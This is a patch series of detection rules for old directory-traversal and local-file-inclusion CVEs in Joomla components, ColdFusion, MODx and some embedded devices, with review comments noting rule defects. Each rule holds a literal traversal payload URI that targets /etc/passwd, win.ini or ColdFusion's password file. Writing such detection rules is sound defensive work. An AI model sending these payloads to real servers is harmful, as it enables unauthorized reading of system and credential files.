+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-2259.yaml b/rules/web/web_cve_CVE-2010-2259.yaml
new file mode 100644
index 00000000..3b175aca
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-2259.yaml
@@ -0,0 +1,25 @@
+title: CVE-2010-2259:Joomla! Component com_bfsurvey - Local File Inclusion
+id: 0f74c630-3e11-41d3-8352-66961fc12085
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component
+ for Joomla! allows remote attackers to include and execute arbitrary local files
+ via a .. (dot dot) in the controller parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/10946
+- https://www.cvedetails.com/cve/CVE-2010-2259
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-2307.yaml b/rules/web/web_cve_CVE-2010-2307.yaml
new file mode 100644
index 00000000..8d787692
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-2307.yaml
@@ -0,0 +1,27 @@
+title: CVE-2010-2307:Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM
+ - Directory Traversal
+id: f03488dd-2c62-4541-9f0e-a11e8a7e1750
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Multiple directory traversal vulnerabilities in the web server for Motorola
+ SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow
+ remote attackers to read arbitrary files via (1) "//" (multiple leading slash),
+ (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
+references:
+- https://www.securityfocus.com/bid/40550/info
+- https://nvd.nist.gov/vuln/detail/CVE-2010-2307
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /../../etc/passwd
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-2682.yaml b/rules/web/web_cve_CVE-2010-2682.yaml
new file mode 100644
index 00000000..01a72dff
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-2682.yaml
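Review bot: The detection string `/../../etc/passwd` is not specific to the Motorola SBV6120E — it matches a two-level traversal probe for /etc/passwd from any scanner against any host — yet the title, description and `critical` level attribute every hit to this particular modem. Either add a selector that ties the match to the device (a host or path that identifies the modem's web server) or retitle it as a generic traversal-probe rule at a lower level, since a URI match alone shows an attempt, not a successful read. The CVE-2010-4231 rule later in this patch, whose string is `/../../../../../../../../../../../../../etc/passwd` for a Camtron camera, has the same problem.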
@@ -0,0 +1,26 @@
+title: CVE-2010-2682:Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
+id: 99824e58-3cce-4172-9970-04e0a6de5108
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna)
+ component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and
+ possibly have unspecified other impact via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+- https://www.exploit-db.com/exploits/14017
+- https://www.cvedetails.com/cve/CVE-2010-2682
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-2861.yaml b/rules/web/web_cve_CVE-2010-2861.yaml
new file mode 100644
index 00000000..e5764559
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-2861.yaml
@@ -0,0 +1,27 @@
+title: CVE-2010-2861:Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI
+id: e22f6ee2-341a-44b8-a58b-33a0960fa8e0
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Multiple directory traversal vulnerabilities in the administrator console
+ in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files
+ via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm,
+ (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm
+ in CFIDE/administrator/.
+references:
+- https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
+- http://www.adobe.com/support/security/bulletins/apsb10-18.html
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-3426.yaml b/rules/web/web_cve_CVE-2010-3426.yaml
new file mode 100644
index 00000000..d0c9a6c0
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-3426.yaml
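Review bot: The description lists five ColdFusion administrator pages that accept the traversing `locale` parameter, but the detection matches only `enter.cfm`, with one fixed traversal depth and one fixed target (`lib/password.properties%00en`), so the other four documented paths are not covered at all. Consider `c-uri|contains|all:` with `/CFIDE/administrator/` and `locale=../` as the list items, which covers every listed page and any target file while still requiring the vulnerable parameter to carry a traversal.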
@@ -0,0 +1,23 @@
+title: CVE-2010-3426:Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion
+id: 8df31def-3d71-4f01-85ab-4891fa481a8c
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone)
+ component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute
+ arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+references:
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-4231.yaml b/rules/web/web_cve_CVE-2010-4231.yaml
new file mode 100644
index 00000000..9863413f
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-4231.yaml
@@ -0,0 +1,25 @@
+title: CVE-2010-4231:Camtron CMNC-200 IP Camera - Directory Traversal
+id: e097e932-b39e-4e00-ac6f-1f03e43fc716
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: The CMNC-200 IP Camera has a built-in web server that is enabled by default.
+ The server is vulnerable to directory transversal attacks, allowing access to any
+ file on the camera file system.
+references:
+- https://nvd.nist.gov/vuln/detail/CVE-2010-4231
+- https://www.exploit-db.com/exploits/15505
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /../../../../../../../../../../../../../etc/passwd
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-4617.yaml b/rules/web/web_cve_CVE-2010-4617.yaml
new file mode 100644
index 00000000..5a1a42e0
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-4617.yaml
@@ -0,0 +1,25 @@
+title: CVE-2010-4617:Joomla! Component JotLoader 2.2.1 - Local File Inclusion
+id: 3965e578-e509-41e2-a572-12522bbcf4fd
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the JotLoader (com_jotloader) component
+ 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory
+ traversal sequences in the section parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/15791
+- https://www.cvedetails.com/cve/CVE-2010-4617
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-5278.yaml b/rules/web/web_cve_CVE-2010-5278.yaml
new file mode 100644
index 00000000..3618fefc
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-5278.yaml
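Review bot: The detection string reads `com_jotloader§ion=`: the `&sect` of `&section=` appears to have been turned into the `§` character, which is what happens when `&sect;` is decoded as an HTML entity. As written the rule can never match a real request, which carries the literal parameter name, so the fragment should read `com_jotloader&section=`. If the `§` is an artefact of how this page was rendered rather than of the file itself, the committed file should still be checked for it.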
@@ -0,0 +1,26 @@
+title: CVE-2010-5278:MODx manager - Local File Inclusion
+id: 5f6499cc-97a6-49ed-af28-00278c2c954e
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php
+ in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled,
+ allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key
+ parameter.
+references:
+- https://www.exploit-db.com/exploits/34788
+- https://www.cvedetails.com/cve/CVE-2010-5278
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
From 5022fdc0855e620ccaff110fef44e420d995cd9f Mon Sep 17 00:00:00 2001
From: pbssubhash Date: Wed, 25 Aug 2021 21:11:21 +0530 Subject: [PATCH 0577/1367] Modified Yaml --- rules/web/web_cve_CVE-2010-0943.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-0944.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-1306.yaml | 23 ++++++++++++ rules/web/web_cve_CVE-2010-1314.yaml | 46 ++++++++++++------------ rules/web/web_cve_CVE-2010-1345.yaml | 46 ++++++++++++------------ rules/web/web_cve_CVE-2010-1353.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-1474.yaml | 52 +++++++++++++-------------- rules/web/web_cve_CVE-2010-1475.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-1495.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-1532.yaml | 48 ++++++++++++------------- rules/web/web_cve_CVE-2010-1533.yaml | 46 ++++++++++++------------ rules/web/web_cve_CVE-2010-1535.yaml | 48 ++++++++++++------------- rules/web/web_cve_CVE-2010-1602.yaml | 52 +++++++++++++-------------- rules/web/web_cve_CVE-2010-1657.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-1718.yaml | 48 ++++++++++++------------- rules/web/web_cve_CVE-2010-1722.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-1875.yaml | 52 +++++++++++++-------------- rules/web/web_cve_CVE-2010-1953.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-1954.yaml | 23 ++++++++++++ rules/web/web_cve_CVE-2010-1955.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-1979.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-1983.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-2033.yaml | 52 +++++++++++++-------------- rules/web/web_cve_CVE-2010-2036.yaml | 52 +++++++++++++-------------- rules/web/web_cve_CVE-2010-2259.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-2307.yaml | 54 ++++++++++++++-------------- rules/web/web_cve_CVE-2010-2682.yaml | 52 +++++++++++++-------------- rules/web/web_cve_CVE-2010-2861.yaml | 54 
++++++++++++++-------------- rules/web/web_cve_CVE-2010-3426.yaml | 46 ++++++++++++------------ rules/web/web_cve_CVE-2010-4231.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-4617.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-5278.yaml | 52 +++++++++++++-------------- 32 files changed, 796 insertions(+), 750 deletions(-) create mode 100644 rules/web/web_cve_CVE-2010-1306.yaml create mode 100644 rules/web/web_cve_CVE-2010-1954.yaml diff --git a/rules/web/web_cve_CVE-2010-0943.yaml b/rules/web/web_cve_CVE-2010-0943.yaml index e90c6aab..59e19742 100644 --- a/rules/web/web_cve_CVE-2010-0943.yaml +++ b/rules/web/web_cve_CVE-2010-0943.yaml 
@@ -1,25 +1,25 @@
-title: CVE-2010-0943:Joomla! Component com_jashowcase - Directory Traversal
-id: a7b7151c-99e5-444b-89db-df927d1055ed
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the JA Showcase (com_jashowcase)
- component for Joomla! allows remote attackers to read arbitrary files via a .. (dot
- dot) in the controller parameter in a jashowcase action to index.php.
-references:
-- https://www.exploit-db.com/exploits/11090
-- https://www.cvedetails.com/cve/CVE-2010-0943
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-0943:Joomla! Component com_jashowcase - Directory Traversal
+id: 6a99f28f-8626-4419-93c8-9aa9e75c0068
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the JA Showcase (com_jashowcase)
+ component for Joomla! allows remote attackers to read arbitrary files via a .. (dot
+ dot) in the controller parameter in a jashowcase action to index.php.
+references:
+- https://www.exploit-db.com/exploits/11090
+- https://www.cvedetails.com/cve/CVE-2010-0943
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-0944.yaml b/rules/web/web_cve_CVE-2010-0944.yaml
index 22499499..2872b219 100644
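Review bot: Every line of this file is removed and re-added although only the `id` value differs between the two sides, which usually means line endings or trailing whitespace changed as well; that hides the real change in review and should be normalised (a `.gitattributes` `text=auto` entry or an editor setting) so the diff shows the single changed line. The commit message "Modified Yaml" also does not say why the rule `id` is regenerated — rule ids are meant to be stable identifiers that downstream consumers key on, so the reason belongs in the message. The same whole-file rewrite appears in the CVE-2010-0944, -1314, -1345, -1353, -1474, -1475, -1495, -1532, -1533, -1535 and -1602 hunks.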
--- a/rules/web/web_cve_CVE-2010-0944.yaml
+++ b/rules/web/web_cve_CVE-2010-0944.yaml
@@ -1,25 +1,25 @@
-title: CVE-2010-0944:Joomla! Component com_jcollection - Directory Traversal
-id: c3a5750d-210b-4a15-b1f7-17444d634a6a
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the JCollection (com_jcollection)
- component for Joomla! allows remote attackers to read arbitrary files via a .. (dot
- dot) in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/11088
-- https://www.cvedetails.com/cve/CVE-2010-0944
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-0944:Joomla! Component com_jcollection - Directory Traversal
+id: ae369f4d-5f22-4969-8715-c8908394f279
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the JCollection (com_jcollection)
+ component for Joomla! allows remote attackers to read arbitrary files via a .. (dot
+ dot) in the controller parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/11088
+- https://www.cvedetails.com/cve/CVE-2010-0944
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1306.yaml b/rules/web/web_cve_CVE-2010-1306.yaml
new file mode 100644
index 00000000..2b48098e
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-1306.yaml
@@ -0,0 +1,23 @@
+title: CVE-2010-1306:Joomla! Component Picasa 2.0 - Local File Inclusion
+id: 3cea101d-f72d-441f-8fdc-8462cfac20e7
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component
+ 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files
+ via a .. (dot dot) in the controller parameter to index.php.
+references:
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1314.yaml b/rules/web/web_cve_CVE-2010-1314.yaml
index 324e4a66..8673ae89 100644
--- a/rules/web/web_cve_CVE-2010-1314.yaml
+++ b/rules/web/web_cve_CVE-2010-1314.yaml
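Review bot: The `references` list of this new rule carries only the generic nuclei-templates repository link, so an analyst triaging a hit has no pointer to the CVE record or an advisory; the sibling rules in this series link the CVE entry, and this one should at least do the same. The CVE-2010-1314, -1345, -1475, -1532, -1533 and -1535 hunks in this commit, and the CVE-2010-3426 file earlier in the series, have the same single-reference list.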
@@ -1,23 +1,23 @@
-title: CVE-2010-1314:Joomla! Component Highslide 1.5 - Local File Inclusion
-id: 226602ff-06ce-4173-9b87-7c2d62b4b3a4
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Highslide JS (com_hsconfig)
- component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files
- via a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-1314:Joomla! Component Highslide 1.5 - Local File Inclusion
+id: 9a7d17b2-ba50-4f83-bd75-92bcb0ba190f
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Highslide JS (com_hsconfig)
+ component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files
+ via a .. (dot dot) in the controller parameter to index.php.
+references:
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1345.yaml b/rules/web/web_cve_CVE-2010-1345.yaml
index 187b3f3c..29326297 100644
--- a/rules/web/web_cve_CVE-2010-1345.yaml
+++ b/rules/web/web_cve_CVE-2010-1345.yaml
@@ -1,23 +1,23 @@
-title: CVE-2010-1345:Joomla! Component Cookex Agency CKForms - Local File Inclusion
-id: ff1015cf-e991-458c-a999-67e30fd34f9a
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms)
- component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via
- a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-1345:Joomla! Component Cookex Agency CKForms - Local File Inclusion
+id: dc5198bb-73cc-4a07-8b6c-b178d6c25265
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms)
+ component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via
+ a .. (dot dot) in the controller parameter to index.php.
+references:
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1353.yaml b/rules/web/web_cve_CVE-2010-1353.yaml
index 77a9f02b..772094e3 100644
--- a/rules/web/web_cve_CVE-2010-1353.yaml
+++ b/rules/web/web_cve_CVE-2010-1353.yaml
@@ -1,25 +1,25 @@
-title: CVE-2010-1353:Joomla! Component LoginBox - Local File Inclusion
-id: dee9b22f-1e7c-44ec-ad34-555ea35c0a6e
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox)
- component for Joomla! allows remote attackers to read arbitrary files via a .. (dot
- dot) in the view parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/12068
-- https://www.cvedetails.com/cve/CVE-2010-1353
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-1353:Joomla! Component LoginBox - Local File Inclusion
+id: ad0a798b-87d2-4701-82d4-f7a253e44d69
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox)
+ component for Joomla! allows remote attackers to read arbitrary files via a .. (dot
+ dot) in the view parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/12068
+- https://www.cvedetails.com/cve/CVE-2010-1353
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1474.yaml b/rules/web/web_cve_CVE-2010-1474.yaml
index f0c21085..a9d56934 100644
--- a/rules/web/web_cve_CVE-2010-1474.yaml
+++ b/rules/web/web_cve_CVE-2010-1474.yaml
@@ -1,26 +1,26 @@
-title: CVE-2010-1474:Joomla! Component Sweetykeeper 1.5 - Local File Inclusion
-id: b2a1a114-6d92-4cce-8b53-b82518abf56c
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper)
- component 1.5.x for Joomla! allows remote attackers to read arbitrary files and
- possibly have unspecified other impact via a .. (dot dot) in the controller parameter
- to index.php.
-references:
-- https://www.exploit-db.com/exploits/12182
-- https://www.cvedetails.com/cve/CVE-2010-1474
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-1474:Joomla! Component Sweetykeeper 1.5 - Local File Inclusion
+id: 1248cb2d-f96a-49a0-83b0-c1e2c74ae397
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper)
+ component 1.5.x for Joomla! allows remote attackers to read arbitrary files and
+ possibly have unspecified other impact via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+- https://www.exploit-db.com/exploits/12182
+- https://www.cvedetails.com/cve/CVE-2010-1474
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1475.yaml b/rules/web/web_cve_CVE-2010-1475.yaml
index b4e9e4f1..465857ed 100644
--- a/rules/web/web_cve_CVE-2010-1475.yaml
+++ b/rules/web/web_cve_CVE-2010-1475.yaml
@@ -1,25 +1,25 @@
-title: CVE-2010-1475:Joomla! Component Preventive And Reservation 1.0.5 - Local File
- Inclusion
-id: 6d1e0e6f-4e68-4f1c-8f60-467521d0c25b
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive)
- component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and
- possibly have unspecified other impact via a .. (dot dot) in the controller parameter
- to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-1475:Joomla! Component Preventive And Reservation 1.0.5 - Local File
+ Inclusion
+id: 5cf9e456-3c79-4d1c-a926-a5a2d20b6f26
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive)
+ component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and
+ possibly have unspecified other impact via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
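Review bot: The detection string still carries a doubled equals sign, `controller==../`, on the new side; a request whose parameter is written the normal way, `controller=../`, does not contain that substring, so the rule misses exactly the traversal it is meant to catch. Replace `controller==` with `controller=` in the `c-uri|contains` value — the id regeneration in this commit touched the line's neighbours but left the typo in place.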
diff --git a/rules/web/web_cve_CVE-2010-1495.yaml b/rules/web/web_cve_CVE-2010-1495.yaml
index a3b4cdc1..db0c2483 100644
--- a/rules/web/web_cve_CVE-2010-1495.yaml
+++ b/rules/web/web_cve_CVE-2010-1495.yaml
@@ -1,25 +1,25 @@
-title: CVE-2010-1495:Joomla! Component Matamko 1.01 - Local File Inclusion
-id: 6edfc22e-9b33-43c4-8872-eb41d6cfb5bd
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Matamko (com_matamko) component
- 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot)
- in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/12286
-- https://www.cvedetails.com/cve/CVE-2010-1495
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-1495:Joomla! Component Matamko 1.01 - Local File Inclusion
+id: 807aa121-81eb-418f-9bbb-a215d8c6f0e7
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Matamko (com_matamko) component
+ 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot)
+ in the controller parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/12286
+- https://www.cvedetails.com/cve/CVE-2010-1495
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
